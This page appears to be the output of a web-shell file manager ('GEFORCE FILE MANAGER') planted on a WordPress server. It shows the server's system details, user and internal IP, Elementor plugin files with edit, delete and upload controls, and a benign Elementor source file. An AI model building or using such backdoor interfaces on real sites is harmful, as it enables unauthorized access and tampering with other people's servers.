[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
elementor
/
modules
/
element-manager
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 admin-menu-items
SET
[ DEL ]
📄 admin-menu-app.php
884 B
SET
[ EDIT ]
|
[ DEL ]
📄 ajax.php
5,859 B
SET
[ EDIT ]
|
[ DEL ]
📄 module.php
3,089 B
SET
[ EDIT ]
|
[ DEL ]
📄 options.php
532 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: admin-menu-app.php
<?php namespace Elementor\Modules\ElementManager; use Elementor\Core\Admin\Menu\Interfaces\Admin_Menu_Item_With_Page; use Elementor\Settings; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } class Admin_Menu_App implements Admin_Menu_Item_With_Page { public function is_visible() { return true; } public function get_parent_slug() { return Settings::PAGE_ID; } public function get_label() { return esc_html__( 'Element Manager', 'elementor' ); } public function get_page_title() { return esc_html__( 'Element Manager', 'elementor' ); } public function get_capability() { return 'manage_options'; } public function render() { echo '<div class="wrap">'; echo '<h3 class="wp-heading-inline">' . esc_html__( 'Element Manager', 'elementor' ) . '</h3>'; echo '<div id="elementor-element-manager-wrap"></div>'; echo '</div>'; } }